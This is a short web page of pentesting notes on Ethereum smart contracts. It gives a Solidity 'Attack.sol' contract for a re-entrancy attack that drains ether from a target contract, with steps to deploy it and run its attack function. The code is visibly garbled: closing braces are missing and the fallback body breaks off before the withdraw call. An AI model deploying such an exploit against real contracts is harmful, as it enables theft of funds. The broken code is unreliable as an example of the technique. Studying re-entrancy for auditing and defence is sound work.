Exploit Notes

Smart Contract Pentesting

Last modified: 2022-12-01

Blockchain Ethereum Web3

A smart contract is a program or a transaction protocol that is commonly used in decentralized applications.


  • Remix IDE

    An online tool that allow us to deploy a smart contract and run transactions.

Re-entrancy Attack

It’s a common vulnerability involving withdraw and deposit in Solidity.
For example, create “Attack.sol”.

pragma solidity ^0.8.10;
import './Target.sol';

contract Attack {

     Target public target;
     constructor(address _targetAddress) {
         target = Target(_targetAddress);

     fallback() external payable {
         if (address(target).balance >= 1 ether) {
     function attack() external payable {
         require(msg.value >= 1 ether);
         target.deposit{value: 1 ether}();

     function getBalance() public view returns (uint) {
         return address(this).balance;

After compiling, deploy it and run “attack” function to get balances by compromising the target contract.

Tools by HDKS


Automatic web fuzzer.


Auto reconnaissance CLI.

Hash Cracker

Hash identifier.